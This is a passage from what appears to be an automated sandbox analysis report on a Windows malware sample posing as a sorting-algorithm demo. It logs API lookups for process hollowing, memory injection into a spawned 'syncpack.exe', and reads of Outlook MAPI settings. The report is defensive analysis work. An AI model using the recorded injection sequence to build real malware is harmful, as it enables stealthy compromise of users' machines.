Get Address c:\windows\syswow64\oleaut32.dll function = VarMonthName, address_out = 0x75a523d5 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75a25934 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75a25a98 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarCat, address_out = 0x75a259b4 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x75a7e405 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarEqv, address_out = 0x75a7ef07 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x75a7f00a True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarImp, address_out = 0x75a7ef47 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x75a7f15e True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x75a7dbd4 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x75a7ecfa True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarPow, address_out = 0x75a7ea66 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x75a7d332 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x75a7ee2e True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarAbs, address_out = 0x75a7ca11 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarFix, address_out = 0x75a7cc5f True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarInt, address_out = 0x75a7cde7 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x75a7c802 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x75a7ec66 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarRound, address_out = 0x75a7d155 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x75a1b0dc True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecAdd, address_out = 0x75a35f3e True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecCmp, address_out = 0x75a24fd0 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCat, address_out = 0x75a20d2c True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyMulI4, address_out = 0x75a359ed True 1
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Get Address c:\windows\syswow64\sxs.dll function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x771e3150 True 1
Get Address c:\windows\syswow64\user32.dll function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Get Address c:\windows\syswow64\user32.dll function = MonitorFromPoint, address_out = 0x771e5281 True 1
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Get Address c:\windows\syswow64\ntdll.dll function = NtAllocateVirtualMemory, address_out = 0x77bffab0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75fc5223 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x75fc103d True 1
Get Address c:\windows\syswow64\ntdll.dll function = NtUnmapViewOfSection, address_out = 0x77bffc70 True 1
Get Address c:\windows\syswow64\ntdll.dll function = NtWriteVirtualMemory, address_out = 0x77bffe04 True 1
Get Address c:\windows\syswow64\ntdll.dll function = NtGetContextThread, address_out = 0x77c00c20 True 1
Get Address c:\windows\syswow64\ntdll.dll function = NtSetContextThread, address_out = 0x77c01910 True 1
Get Address c:\windows\syswow64\ntdll.dll function = NtResumeThread, address_out = 0x77c00058 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x75fd174d True 1
Window (21)
Operation Window Name Additional Information Success Count
Create - class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Create - class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Create - class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Create Sorting Algorithm Comparison wndproc_parameter = 0 True 1
Create RadixSort wndproc_parameter = 0 True 1
Create MergeSort wndproc_parameter = 0 True 1
Create QuickSort wndproc_parameter = 0 True 1
Create HeapSort wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create InsertSort wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Create - wndproc_parameter = 0 True 1
Set Attribute - class_name = VBMsoStdCompMgr, index = 0, new_long = 246816924 False 1
Keyboard (1)
Operation Additional Information Success Count
Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
System (1106)
Operation Additional Information Success Count
Sleep duration = 0 milliseconds (0.000 seconds) True 29
Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 16
Get Time type = Ticks, time = 252752 True 1
Get Time type = Ticks, time = 252784 True 1
Get Time type = Ticks, time = 252924 True 6
Get Time type = Ticks, time = 252940 True 5
Get Time type = Ticks, time = 252971 True 5
Get Time type = Ticks, time = 252986 True 5
Get Time type = Ticks, time = 253002 True 5
Get Time type = Ticks, time = 253033 True 5
Get Time type = Ticks, time = 253064 True 1
Get Time type = Ticks, time = 253080 True 4
Get Time type = Ticks, time = 253096 True 5
Get Time type = Ticks, time = 253111 True 5
Get Time type = Ticks, time = 253142 True 5
Get Time type = Ticks, time = 253158 True 5
Get Time type = Ticks, time = 253189 True 5
Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 17
Get Time type = Ticks, time = 253205 True 5
Get Time type = Ticks, time = 253220 True 5
Get Time type = Ticks, time = 253236 True 1
Get Time type = Ticks, time = 253252 True 4
Get Time type = Ticks, time = 253267 True 5
Get Time type = Ticks, time = 253283 True 5
Get Time type = Ticks, time = 253314 True 15
Get Time type = Ticks, time = 253330 True 1
Get Time type = Ticks, time = 253345 True 14
Get Time type = Ticks, time = 253361 True 10
Get Time type = Ticks, time = 253376 True 15
Get Time type = Ticks, time = 253392 True 10
Get Time type = Ticks, time = 253408 True 5
Get Time type = Ticks, time = 253423 True 5
Get Time type = Ticks, time = 253439 True 5
Get Time type = Ticks, time = 253454 True 10
Get Time type = Ticks, time = 253470 True 10
Get Time type = Ticks, time = 253486 True 10
Get Time type = Ticks, time = 253517 True 10
Get Time type = Ticks, time = 253532 True 10
Get Time type = Ticks, time = 253548 True 15
Get Time type = Ticks, time = 253564 True 10
Get Time type = Ticks, time = 253579 True 5
Get Time type = Ticks, time = 253595 True 5
Get Time type = Ticks, time = 253610 True 5
Get Time type = Ticks, time = 253642 True 10
Get Time type = Ticks, time = 253657 True 5
Get Time type = Ticks, time = 253704 True 5
Get Time type = Ticks, time = 253735 True 10
Get Time type = Ticks, time = 253751 True 10
Get Time type = Ticks, time = 253766 True 25
Get Time type = Ticks, time = 253782 True 40
Get Time type = Ticks, time = 253798 True 16
Get Time type = Ticks, time = 253813 True 4
Get Time type = Ticks, time = 253829 True 10
Get Time type = Ticks, time = 253844 True 10
Get Time type = Ticks, time = 253860 True 5
Get Time type = Ticks, time = 253907 True 5
Get Time type = Ticks, time = 253922 True 1
Get Time type = Ticks, time = 253969 True 5
Get Time type = Ticks, time = 253985 True 14
Get Time type = Ticks, time = 254000 True 10
Get Time type = Ticks, time = 254016 True 5
Get Time type = Ticks, time = 254032 True 5
Get Time type = Ticks, time = 254047 True 10
Get Time type = Ticks, time = 254063 True 5
Get Time type = Ticks, time = 254078 True 5
Get Time type = Ticks, time = 254094 True 5
Get Time type = Ticks, time = 254110 True 5
Get Time type = Ticks, time = 254125 True 10
Get Time type = Ticks, time = 254141 True 15
Get Time type = Ticks, time = 254156 True 5
Get Time type = Ticks, time = 254172 True 5
Get Time type = Ticks, time = 254188 True 10
Get Time type = Ticks, time = 254203 True 10
Get Time type = Ticks, time = 254219 True 5
Get Time type = Ticks, time = 254234 True 5
Get Time type = Ticks, time = 254250 True 5
Get Time type = Ticks, time = 254266 True 5
Get Time type = Ticks, time = 254281 True 5
Get Time type = Ticks, time = 254297 True 5
Get Time type = Ticks, time = 254328 True 15
Get Time type = Ticks, time = 254344 True 5
Get Time type = Ticks, time = 254359 True 5
Get Time type = Ticks, time = 254375 True 5
Get Time type = Ticks, time = 254390 True 5
Get Time type = Ticks, time = 254406 True 5
Get Time type = Ticks, time = 254422 True 5
Get Time type = Ticks, time = 254437 True 5
Get Time type = Ticks, time = 254453 True 10
Get Time type = Ticks, time = 254468 True 5
Get Time type = Ticks, time = 254484 True 20
Get Time type = Ticks, time = 254515 True 6
Get Time type = Ticks, time = 254531 True 49
Get Time type = Ticks, time = 254546 True 45
Get Time type = Ticks, time = 254562 True 35
Get Time type = Ticks, time = 254578 True 5
Get Time type = Ticks, time = 254593 True 40
Get Time type = Ticks, time = 254609 True 20
Get Time type = Ticks, time = 254624 True 5
Get Time type = Ticks, time = 254640 True 45
Get Time type = Ticks, time = 254656 True 45
Get Time type = Ticks, time = 254671 True 30
Get Time type = Ticks, time = 254687 True 35
Get Time type = Ticks, time = 254702 True 17
Get Time type = Local Time, time = 2018-06-26 00:54:28 (Local Time) True 1
Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 3
Get Time type = Ticks, time = 268259 True 1
Get Time type = Ticks, time = 268306 True 1
Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Get Info type = Operating System True 3
Get Info type = Operating System True 2
Get Info type = Hardware Information True 1
Get Info type = Windows Directory, result_out = C:\Windows True 1
Mutex (1)
Operation Additional Information Success Count
Create - True 1
Environment (1)
Operation Additional Information Success Count
Get Environment String - True 1
Process #10: syncpack.exe
Information Value
ID #10
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0x8a0
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x608
0xA8
0x79C
0x280
0x740
0x978
0x9B0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00212fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00220000 0x00220fff Memory Mapped File Readable False False False -
pagefile_0x0000000000220000 0x00220000 0x00222fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
private_0x0000000000240000 0x00240000 0x00243fff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x00267fff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x003cefff Pagefile Backed Memory Readable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory - True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x004bffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d10000 0x01d10000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001d10000 0x01d10000 0x01d1ffff Private Memory Readable, Writable True False False -
private_0x0000000001d20000 0x01d20000 0x01d9ffff Private Memory Readable, Writable True False False -
private_0x0000000001da0000 0x01da0000 0x01ddffff Private Memory Readable, Writable True False False -
private_0x0000000001de0000 0x01de0000 0x01deffff Private Memory Readable, Writable True False False -
private_0x0000000001df0000 0x01df0000 0x01e2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e30000 0x01e30000 0x01e30fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e40000 0x01e40000 0x01e40fff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000001e60000 0x01e60000 0x01e62fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e70000 0x01e70000 0x01e70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e80000 0x01e80000 0x01e80fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e90000 0x01e90000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001ea0000 0x01ea0000 0x01ea2fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x01ebffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002060000 0x02060000 0x0224ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002060000 0x02060000 0x0215ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021b0000 0x021b0000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002390000 0x02390000 0x023cffff Private Memory Readable, Writable True False False -
private_0x00000000023d0000 0x023d0000 0x0240ffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0244ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02450000 0x0271efff Memory Mapped File Readable False False False -
office.odf 0x02720000 0x02959fff Memory Mapped File Readable False False False -
pagefile_0x0000000002960000 0x02960000 0x02d5ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02e60fff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d9ffff Private Memory Readable, Writable True False False -
private_0x0000000002e50000 0x02e50000 0x02e8ffff Private Memory Readable, Writable True False False -
private_0x0000000002e90000 0x02e90000 0x02f8ffff Private Memory Readable, Writable True False False -
private_0x0000000004290000 0x04290000 0x0438ffff Private Memory Readable, Writable True False False -
private_0x0000000004390000 0x04390000 0x0448ffff Private Memory Readable, Writable True False False -
private_0x0000000004490000 0x04490000 0x0458ffff Private Memory Readable, Writable True False False -
private_0x0000000004590000 0x04590000 0x0468ffff Private Memory Readable, Writable True False False -
mspst32.dll 0x6fb80000 0x6fc8cfff Memory Mapped File Readable, Writable, Executable False False False -
contab32.dll 0x6fc90000 0x6fcb0fff Memory Mapped File Readable, Writable, Executable False False False -
sfc_os.dll 0x6fcc0000 0x6fcccfff Memory Mapped File Readable, Writable, Executable False False False -
sfc.dll 0x6fcf0000 0x6fcf2fff Memory Mapped File Readable, Writable, Executable False False False -
mapir.dll 0x6fd00000 0x6fe30fff Memory Mapped File Readable, Writable, Executable False False False -
olmapi32.dll 0x6feb0000 0x70181fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
riched20.dll 0x744d0000 0x745d8fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msi.dll 0x74a70000 0x74caffff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x400000, size = 102400 True 1 Fn Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efde008, size = 4 True 1 Fn Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efdf010, size = 4 True 1 Fn Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x608, address = 0x0 True 1 Fn
Host Behavior
COM (1)
Operation Class Interface Additional Information Success Count Logfile
Create ED475410-B0D6-11D2-8C3B-00104B2A6676 9240A6CD-AF41-11D2-8C3B-00104B2A6676 cls_context = CLSCTX_INPROC_SERVER True 1 Fn
File (5)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp desired_access = FILE_APPEND_DATA True 1 Fn
Open STD_INPUT_HANDLE - True 1 Fn
Open STD_OUTPUT_HANDLE - True 1 Fn
Open STD_ERROR_HANDLE - True 1 Fn
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp size = 50 True 1 Fn Data
Registry (2)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook - True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = DLLPathEx, data = 67 True 1 Fn
Module (37)
Operation Module Additional Information Success Count Logfile
Load C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL base_address = 0x6feb0000 True 1 Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 1 Fn
Get Handle mscoree.dll - False 1 Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75fc4f2b True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75fc359f True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75fc1252 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75fc4208 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x7604410b True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76044195 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75fcd31f True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75fdee7e True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x77c2441c True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x77c4c381 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75fdf088 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x77c305d7 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x77c4ca24 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77c00b8c True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77c51e1d True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76044761 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x7603cd11 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7604424f True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x760446b1 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76056676 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76044751 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x760565f1 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x760447c1 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x760447e1 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x760447f1 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75fdeee0 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1 Fn
System (1)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:23 (UTC) True 1 Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1 Fn Data
Process #11: syncpack.exe
405 0
Information Value
ID #11
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0x728
